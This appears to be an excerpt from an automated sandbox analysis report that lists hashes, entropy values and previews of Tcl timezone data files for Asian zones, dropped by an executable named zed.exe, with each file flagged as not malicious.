                                                                                                                                                                                                                                            Size (bytes):2117
                                                                                                                                                                                                                                            Entropy (8bit):3.7025684250364725
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5VeTtXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFEnsr:5n40yVRB7VfXucdKmtTTDOV
                                                                                                                                                                                                                                            MD5:6CC13B6910412A3A3D16CA36ADF00352
                                                                                                                                                                                                                                            SHA1:061CF4A8FEA8C139F50F96E6B6506B50ED3DD792
                                                                                                                                                                                                                                            SHA-256:992F93A7975F8CD4E94D96B3BA1ECFB3585E52A53F4442A15993402D3F955F66
                                                                                                                                                                                                                                            SHA-512:4E9750B1C3C0BA4F7922BCBC76276A3E74031D78A98E21DC59F66D6EA8E1B70865BBEB50A6B77EB0423421A18428B97B47412053CE15213128CEED669F4DD6E8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Barnaul) {.. {-9223372036854775808 20100 0 LMT}.. {-1579844100 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {76470
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8024
                                                                                                                                                                                                                                            Entropy (8bit):3.7230911686481774
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:4nBKPP8LFH0TDkywaZb1QSCK5VUjiO1PoBQpo7778CZicJZS80EGcLt4Mok1MgJl:4M38LCRZb+sAiO1PoBQpo1ikjD
                                                                                                                                                                                                                                            MD5:1D99E2BBB01B1669403CFBAF7E03F733
                                                                                                                                                                                                                                            SHA1:DBDD58C7FD195FC602C4541D6F416CC96094C121
                                                                                                                                                                                                                                            SHA-256:17AF14646D562AFE17DCCFD1D2FBA95C122F3E0263906A36EB48BFF04ACF233E
                                                                                                                                                                                                                                            SHA-512:98524E8DCD17C090058F17BDA1200D9801EB1B14EB5CEB8C31149A4A402A53BA4923A2AFF457E0A72DAA601D88095247806F945F704000F874FCBF73631DD135
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Beirut) {.. {-9223372036854775808 8520 0 LMT}.. {-2840149320 7200 0 EET}.. {-1570413600 10800 1 EEST}.. {-1552186800 7200 0 EET}.. {-1538359200 10800 1 EEST}.. {-1522551600 7200 0 EET}.. {-1507514400 10800 1 EEST}.. {-1490583600 7200 0 EET}.. {-1473645600 10800 1 EEST}.. {-1460948400 7200 0 EET}.. {-399866400 10800 1 EEST}.. {-386650800 7200 0 EET}.. {-368330400 10800 1 EEST}.. {-355114800 7200 0 EET}.. {-336794400 10800 1 EEST}.. {-323578800 7200 0 EET}.. {-305172000 10800 1 EEST}.. {-291956400 7200 0 EET}.. {-273636000 10800 1 EEST}.. {-260420400 7200 0 EET}.. {78012000 10800 1 EEST}.. {86734800 7200 0 EET}.. {105055200 10800 1 EEST}.. {118270800 7200 0 EET}.. {136591200 10800 1 EEST}.. {149806800 7200 0 EET}.. {168127200 10800 1 EEST}.. {181342800 7200 0 EET}.. {199749600 10800 1 EEST}.. {212965200 7200 0 EET}.. {231285600 10800
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1669
                                                                                                                                                                                                                                            Entropy (8bit):3.7443715330695735
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5qvdJqxiF0rvK5XvV4vUzvCjvT7voPvkPvJUbvn0vYpv99v3uvuWvKJhv3T:Ad1mzK5/VkULCbTjoHkHJUDnQYV9p3mO
                                                                                                                                                                                                                                            MD5:1EE8FF3DF0D931A140ADBB021EB3BFEB
                                                                                                                                                                                                                                            SHA1:F1F15EF70C4E9F456849AF89CAC97AD747D9E192
                                                                                                                                                                                                                                            SHA-256:1D5E9A8F6A04273AF741F648EF10718B004A60D7884FE432DDF85A8F558BEA98
                                                                                                                                                                                                                                            SHA-512:155539A5CF21A34FBFACBF1652D934BF32255F4E505E60B3B4D8B5F2F7FAE552E6CB4824D8608A9C56370F58E48702335995BBD16B7A296A86A72A615FBC8ABC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Bishkek) {.. {-9223372036854775808 17904 0 LMT}.. {-1441169904 18000 0 +05}.. {-1247547600 21600 0 +06}.. {354909600 25200 1 +06}.. {370717200 21600 0 +06}.. {386445600 25200 1 +06}.. {402253200 21600 0 +06}.. {417981600 25200 1 +06}.. {433789200 21600 0 +06}.. {449604000 25200 1 +06}.. {465336000 21600 0 +06}.. {481060800 25200 1 +06}.. {496785600 21600 0 +06}.. {512510400 25200 1 +06}.. {528235200 21600 0 +06}.. {543960000 25200 1 +06}.. {559684800 21600 0 +06}.. {575409600 25200 1 +06}.. {591134400 21600 0 +06}.. {606859200 25200 1 +06}.. {622584000 21600 0 +06}.. {638308800 25200 1 +06}.. {654638400 21600 0 +06}.. {670363200 18000 0 +05}.. {670366800 21600 1 +05}.. {683586000 18000 0 +05}.. {703018800 21600 1 +05}.. {717530400 18000 0 +05}.. {734468400 21600 1 +05}.. {748980000 18000 0 +05}.. {765918000 21600 1 +05}.. {78042
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):176
                                                                                                                                                                                                                                            Entropy (8bit):4.949517569857329
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8kLP/vXHAIgN16L1RL/2WFKXeAMM7QWFKPLPyn:SlSWB9vsM3yELPHAIg+L1N/2wK0oQwKW
                                                                                                                                                                                                                                            MD5:716D842F23974137C5E07A1A65CEFC5D
                                                                                                                                                                                                                                            SHA1:C7248C9DBD6AE5AF33BD4B3602D17737EBE023A0
                                                                                                                                                                                                                                            SHA-256:F3110E9DD514E3654A9DE777E22B2D2391692927954B4B7E42ED54AB665C3CF5
                                                                                                                                                                                                                                            SHA-512:4EC012EAABE60728D9447EEDF4BA7B16CA82786AA39EE79B2F9B32F227F9816FCE42F173153261F9AF88A12209752E84EBD7170C54D126C2DBB1ED3A8D069668
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Kuching)]} {.. LoadTimeZoneFile Asia/Kuching..}..set TZData(:Asia/Brunei) $TZData(:Asia/Kuching)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178
                                                                                                                                                                                                                                            Entropy (8bit):4.774027471796823
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq864DyXHAIgN1QvRL/2WFKh0s+WFKvovn:SlSWB9vsM3ya4DSHAIgcvN/2wKN+wKvy
                                                                                                                                                                                                                                            MD5:8BB098AB77CB0469B1FA0E0B64C4A9E7
                                                                                                                                                                                                                                            SHA1:88C73626985071DD0923E1CAB343ACCD854A7297
                                                                                                                                                                                                                                            SHA-256:1BAEF7850111D2C33B2A766A8AE804534ABA1711BF80A4087A89656DDD8469D5
                                                                                                                                                                                                                                            SHA-512:82216A7F787AF20A4C97C7AA754CD6BE979FEF24137CF9A8B18EECA5E8FBCF12834DD8A6FC9CD2357D807F1629806745B46B11DC0472E0284E18DCCC983897DE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Kolkata)]} {.. LoadTimeZoneFile Asia/Kolkata..}..set TZData(:Asia/Calcutta) $TZData(:Asia/Kolkata)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2086
                                                                                                                                                                                                                                            Entropy (8bit):3.6981807774781017
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5Bpr1gIgWH/lt0irzEzCSCItWiIrW+rDQk9CVhyFY7rRWjYuhUmgr2M:95PhtjLiII2ZFlgd
                                                                                                                                                                                                                                            MD5:69E03A5CEB689E19B60168C0F7EBAE8E
                                                                                                                                                                                                                                            SHA1:95C6396EB753753B4FE4AE1B98D76332523E72A4
                                                                                                                                                                                                                                            SHA-256:10B6F435B05D887176A4D90CA5AC957F327F62F36F15D6F6E4F81844662429B9
                                                                                                                                                                                                                                            SHA-512:DFA72EDC54A11F0840ADBEE7F5AD8EA472AA52A1F196292F1341CD92A68FB2EC0A5BC7DE6C8E83C975420DB4B76CECD4393370FDB2C09F86EC11A50E540F6F02
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Chita) {.. {-9223372036854775808 27232 0 LMT}.. {-1579419232 28800 0 +08}.. {-1247558400 32400 0 +10}.. {354898800 36000 1 +10}.. {370706400 32400 0 +09}.. {386434800 36000 1 +10}.. {402242400 32400 0 +09}.. {417970800 36000 1 +10}.. {433778400 32400 0 +09}.. {449593200 36000 1 +10}.. {465325200 32400 0 +09}.. {481050000 36000 1 +10}.. {496774800 32400 0 +09}.. {512499600 36000 1 +10}.. {528224400 32400 0 +09}.. {543949200 36000 1 +10}.. {559674000 32400 0 +09}.. {575398800 36000 1 +10}.. {591123600 32400 0 +09}.. {606848400 36000 1 +10}.. {622573200 32400 0 +09}.. {638298000 36000 1 +10}.. {654627600 32400 0 +09}.. {670352400 28800 0 +09}.. {670356000 32400 1 +09}.. {686080800 28800 0 +08}.. {695757600 32400 0 +10}.. {701802000 36000 1 +10}.. {717526800 32400 0 +09}.. {733251600 36000 1 +10}.. {748976400 32400 0 +09}.. {7647012
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1619
                                                                                                                                                                                                                                            Entropy (8bit):3.775783980828041
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5th5fSW2sp4Qh2rRSQnGw7GywvWbC25XrMYWG4AIQTUhp9pkTGdXguHaena44XY5:rh5kpmWG29QFUmD
                                                                                                                                                                                                                                            MD5:540A7304A62ABB8D7F84454ABD6E2556
                                                                                                                                                                                                                                            SHA1:52C37529929218A668D7A4AD6FD1B5FE0A727E16
                                                                                                                                                                                                                                            SHA-256:94B2C14EF45C695EF6B19D94722E1BCBB629A595F2866DBA80F00A66721040B5
                                                                                                                                                                                                                                            SHA-512:3B535D109DB369E301D6B412F21EC990976B997826F22B2E16ECEEEB048D60F064C7CA1A616393DC2F1B491BAC0548DC0965B9EA149A95280FFDBCAD6726EF0F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Choibalsan) {.. {-9223372036854775808 27480 0 LMT}.. {-2032933080 25200 0 +07}.. {252435600 28800 0 +08}.. {417974400 36000 0 +09}.. {433778400 32400 0 +09}.. {449593200 36000 1 +09}.. {465314400 32400 0 +09}.. {481042800 36000 1 +09}.. {496764000 32400 0 +09}.. {512492400 36000 1 +09}.. {528213600 32400 0 +09}.. {543942000 36000 1 +09}.. {559663200 32400 0 +09}.. {575391600 36000 1 +09}.. {591112800 32400 0 +09}.. {606841200 36000 1 +09}.. {622562400 32400 0 +09}.. {638290800 36000 1 +09}.. {654616800 32400 0 +09}.. {670345200 36000 1 +09}.. {686066400 32400 0 +09}.. {701794800 36000 1 +09}.. {717516000 32400 0 +09}.. {733244400 36000 1 +09}.. {748965600 32400 0 +09}.. {764694000 36000 1 +09}.. {780415200 32400 0 +09}.. {796143600 36000 1 +09}.. {811864800 32400 0 +09}.. {828198000 36000 1 +09}.. {843919200 32400 0 +09}.. {8596
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):182
                                                                                                                                                                                                                                            Entropy (8bit):4.865222436335267
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8qvfXHAIgNtaYFARL/2WFKh2V7/4WFKdy:SlSWB9vsM3yMPHAIgO8AN/2wKho4wKU
                                                                                                                                                                                                                                            MD5:C5DC40C6325391F7247251ADB2C07F78
                                                                                                                                                                                                                                            SHA1:3DDB1BF94532FB1F1271095B9C8CAA779BC545EF
                                                                                                                                                                                                                                            SHA-256:A87382DC5F3C3141547A65E3746AF1DAF94B51468B96DA6CEF30E95754C97D37
                                                                                                                                                                                                                                            SHA-512:062FF8D5E5392E5372B0405EDF3C7CF997AC33F95EBFFAA9CC9AB82BBE27B60C80255FCCEE9E6F5E02CBFCB163F99984BB2103217FFD1F80BDEC5C684BF2F61A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Shanghai)]} {.. LoadTimeZoneFile Asia/Shanghai..}..set TZData(:Asia/Chongqing) $TZData(:Asia/Shanghai)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):182
                                                                                                                                                                                                                                            Entropy (8bit):4.889115378893491
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8qvfXHAIgNtaYFARL/2WFK7LeL9J4WFKdy:SlSWB9vsM3yMPHAIgO8AN/2wK7LUT4wj
                                                                                                                                                                                                                                            MD5:C3676771EB813B346F58A7B574D0D7B5
                                                                                                                                                                                                                                            SHA1:A473EF621309E019F29F3DEF95C38593775B8404
                                                                                                                                                                                                                                            SHA-256:D6D2B4A761C547F1F853AE901AC71AB49FBE825037079C4E0C89DC940AE4A822
                                                                                                                                                                                                                                            SHA-512:21C3A5D499E6E0427FBF585CA8CC5D99D193C586483AB107C4D8E9F9DC8412021E8E019A314757DAFE1225D2635F6D48E9C54A511709863F22A02449FA201E02
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Shanghai)]} {.. LoadTimeZoneFile Asia/Shanghai..}..set TZData(:Asia/Chungking) $TZData(:Asia/Shanghai)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):369
                                                                                                                                                                                                                                            Entropy (8bit):4.465596050904646
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wKr+iDm2OHgoHvZv9tdvjSWV/FSQipPUrKkTD/k5QqRVVFSQOR/UIp:MB862zZmdHgCvZvJvj1Nj+Phkv/YtvjA
                                                                                                                                                                                                                                            MD5:9541BB43E79AB0C6E8163945B5BFB1BF
                                                                                                                                                                                                                                            SHA1:C4994420DB8313DECDE19B4B9F6C5DB0126A95A7
                                                                                                                                                                                                                                            SHA-256:E5B5E6D607A15DA65CB00C92C35A63EAF25F547E64CB34BB419CB8CFC2714B1B
                                                                                                                                                                                                                                            SHA-512:46F623B3F7CF8A50F97DD812521398EB9100C9CDFB967C18EF1BD112306AAEB3C9CB224424E48611CB8CC21D1DC3D820DD83032D12BC9DF19301CF07786FA664
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Colombo) {.. {-9223372036854775808 19164 0 LMT}.. {-2840159964 19172 0 MMT}.. {-2019705572 19800 0 +0530}.. {-883287000 21600 1 +06}.. {-862639200 23400 1 +0630}.. {-764051400 19800 0 +0530}.. {832962600 23400 0 +0630}.. {846266400 21600 0 +06}.. {1145039400 19800 0 +0530}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):169
                                                                                                                                                                                                                                            Entropy (8bit):4.786111096226559
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8ntyXHAIgN6KyFvRL/2WFK1S2WFKwBn:SlSWB9vsM3yHtSHAIgMKON/2wKM2wKwB
                                                                                                                                                                                                                                            MD5:BA575D37459540907A644438071277F8
                                                                                                                                                                                                                                            SHA1:14CF10D6AABBAF7BAE42B3B9641D8469C206567F
                                                                                                                                                                                                                                            SHA-256:B3AD560F66EA330E54A147017E6E6AB64452A5255D097B962D540836D7B19EE7
                                                                                                                                                                                                                                            SHA-512:9CA386EF4D812B00C2E63558B81B273F92BBCA98AF304C9FD6FC166210FC4E2F92B769E1D6FB96B670650DC76EFFAD2FC6E39AE12C24B47EAED4E50A2AFAC2D7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Dhaka)]} {.. LoadTimeZoneFile Asia/Dhaka..}..set TZData(:Asia/Dacca) $TZData(:Asia/Dhaka)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3692
                                                                                                                                                                                                                                            Entropy (8bit):3.7832279883701254
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:59xu6+RYla5W87rtYV08a7bd+dYV004X7JkX3Q0dzPeP2ua/XAog7jP/xZsNaTvT:8YI5WpVAdVGlkBOLh8X0CkBheIFlR
                                                                                                                                                                                                                                            MD5:1D6B2CC38669C0F7378D9A576F10C477
                                                                                                                                                                                                                                            SHA1:09A31E6295D9FC39219DFA4FC598B46F55C41180
                                                                                                                                                                                                                                            SHA-256:7E577F0F9DA459BA1A325BE95C1FA0DB2C6ECFC1D64CDB73F3ADB09588293BA7
                                                                                                                                                                                                                                            SHA-512:A0BBD5CE7883C275BF9752C75BA0C9AF0181046D94D27EFC96EC8823C374BADCB69B2B11D2C4497295E5BC25D5790634C69C6E7185F406F2107A8E16044E670F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Damascus) {.. {-9223372036854775808 8712 0 LMT}.. {-1577931912 7200 0 EET}.. {-1568592000 10800 1 EEST}.. {-1554080400 7200 0 EET}.. {-1537142400 10800 1 EEST}.. {-1522630800 7200 0 EET}.. {-1505692800 10800 1 EEST}.. {-1491181200 7200 0 EET}.. {-1474243200 10800 1 EEST}.. {-1459126800 7200 0 EET}.. {-242265600 10800 1 EEST}.. {-228877200 7200 0 EET}.. {-210556800 10800 1 EEST}.. {-197427600 7200 0 EET}.. {-178934400 10800 1 EEST}.. {-165718800 7200 0 EET}.. {-147398400 10800 1 EEST}.. {-134269200 7200 0 EET}.. {-116467200 10800 1 EEST}.. {-102646800 7200 0 EET}.. {-84326400 10800 1 EEST}.. {-71110800 7200 0 EET}.. {-52704000 10800 1 EEST}.. {-39488400 7200 0 EET}.. {-21168000 10800 1 EEST}.. {-7952400 7200 0 EET}.. {10368000 10800 1 EEST}.. {23583600 7200 0 EET}.. {41904000 10800 1 EEST}.. {55119600 7200 0 EET}.. {73526400 10800 1
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):364
                                                                                                                                                                                                                                            Entropy (8bit):4.412125512631861
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wKwiDm2OHEmVFnoHv9vX+Yl7UIFckVVFSQiL/FG/UIvy/Ur9i/Ur97:MB862Y2mdHzdCv9P+Y9vvjeQlP9/9VkK
                                                                                                                                                                                                                                            MD5:B5496A038AC230B9D75AA22BB2BE6BDD
                                                                                                                                                                                                                                            SHA1:ACFD9C78F803F344272E8E188C41ED969EBADA16
                                                                                                                                                                                                                                            SHA-256:BFC4562055CC4355E79F9EFAA580A4C6A658285916159A5D390A0CDA96A97E98
                                                                                                                                                                                                                                            SHA-512:AB05D0176DADC1ED03CC526C372B9827A5FA03459E4F4B4365C6CE4B6FBDA043514A9D3FE2DA747159C5A1BC0E07727E6578A101E42B4DB120AF9624368C5FEA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Dhaka) {.. {-9223372036854775808 21700 0 LMT}.. {-2524543300 21200 0 HMT}.. {-891582800 23400 0 +0630}.. {-872058600 19800 0 +0530}.. {-862637400 23400 0 +0630}.. {-576138600 21600 0 +06}.. {1230746400 21600 0 +06}.. {1245430800 25200 1 +06}.. {1262278800 21600 0 +06}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):235
                                                                                                                                                                                                                                            Entropy (8bit):4.597480383845617
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wKCXeSDm2OHnBGeoH1mpvyvScHTU71avScr:MB862qXbmdHnBvC1SyHHq8Hr
                                                                                                                                                                                                                                            MD5:316DDF860FA234621698EB473E558DB7
                                                                                                                                                                                                                                            SHA1:35BF955F764555945CF8B314B8E881DAD6CF557B
                                                                                                                                                                                                                                            SHA-256:8BC2E0D77AC35B6D63E11B820AC45EC23A4195ED773680C600C772FDF4B953F8
                                                                                                                                                                                                                                            SHA-512:D1A8D5F1DAAB7827BDCBC14506AF8681FD1ED94C6101CC4A3C8CC2A76EA7D3649038069158C539A2007A1B0734FBD87DE120415E07A3F08F44417100C95459F5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Dili) {.. {-9223372036854775808 30140 0 LMT}.. {-1830414140 28800 0 +08}.. {-879152400 32400 0 +09}.. {199897200 28800 0 +08}.. {969120000 32400 0 +09}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):148
                                                                                                                                                                                                                                            Entropy (8bit):4.97292023820863
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2WFKQUMXGm2OHvkdoHsQK23NVsRYovV:SlSWB9eg/2wKQUDm2OHvsoHxVNSN
                                                                                                                                                                                                                                            MD5:861BA4A0A71E6C3F71B90074275FD57C
                                                                                                                                                                                                                                            SHA1:BC6FC5233340BB19AE4BD0BA563875479AC0A2B9
                                                                                                                                                                                                                                            SHA-256:3DB174F1568BC23BF467A3DC7BAF8A2A2952B70653D4DE54F4DB391EC50B6925
                                                                                                                                                                                                                                            SHA-512:B187735E0783F299253D9F93E002AEFF131FCCA50FB3E04CF0545B334B051D5ED978108A47C6957B608F5F93ED4CC3D69751FE0F40413719EE1C0440CD49AC76
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Dubai) {.. {-9223372036854775808 13272 0 LMT}.. {-1577936472 14400 0 +04}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):820
                                                                                                                                                                                                                                            Entropy (8bit):3.969189280047274
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5we3dJvOt81FCuLqecDngO6jPvTpYy5T4TiFGDr:5BvdJqxiF0uGr
                                                                                                                                                                                                                                            MD5:9ABD0ECB5F3E738F49CDD1F81C9FF1A4
                                                                                                                                                                                                                                            SHA1:46B68C7BBD1BE9791B00128A5129AA3668435C93
                                                                                                                                                                                                                                            SHA-256:550DB44595F59D0F151BE4AF70D6FECE20580AB687EF45DE2A0A75FB2515AC80
                                                                                                                                                                                                                                            SHA-512:67E2B0EF216D509C4B6DD367519E0A733E54A7CA767D5F7960715E8056E61B7B633C7516D568544F55C9277E90412C1443B822C6EED3341C01F1BD9AA9476FA1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Dushanbe) {.. {-9223372036854775808 16512 0 LMT}.. {-1441168512 18000 0 +05}.. {-1247547600 21600 0 +06}.. {354909600 25200 1 +06}.. {370717200 21600 0 +06}.. {386445600 25200 1 +06}.. {402253200 21600 0 +06}.. {417981600 25200 1 +06}.. {433789200 21600 0 +06}.. {449604000 25200 1 +06}.. {465336000 21600 0 +06}.. {481060800 25200 1 +06}.. {496785600 21600 0 +06}.. {512510400 25200 1 +06}.. {528235200 21600 0 +06}.. {543960000 25200 1 +06}.. {559684800 21600 0 +06}.. {575409600 25200 1 +06}.. {591134400 21600 0 +06}.. {606859200 25200 1 +06}.. {622584000 21600 0 +06}.. {638308800 25200 1 +06}.. {654638400 21600 0 +06}.. {670363200 21600 1 +06}.. {684363600 18000 0 +05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7597
                                                                                                                                                                                                                                            Entropy (8bit):3.7170041442081203
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:G3pv/7V6Aj8aZaNlK0UpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBKb0l:G3v/AaaivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:F8E4BA3E260452AE13CF234E60149A62
                                                                                                                                                                                                                                            SHA1:8DDB08E2FDEEF6539EE0C0038B166908BFED16CD
                                                                                                                                                                                                                                            SHA-256:8CFE85C48FC22033411432F8B75EE4C097A5D84897698CB1AFD5AB51C47FF5A3
                                                                                                                                                                                                                                            SHA-512:487177411FB7E9F83AB9AAD84B685322B13A85784D4F90BB9C30F57BFAA6A9298E5C4F36C97444DE1117E51F85A62DC639D08B405460D071C2B29C898553E9A3
                                                                                                                                                                                                                                            Malicious:false
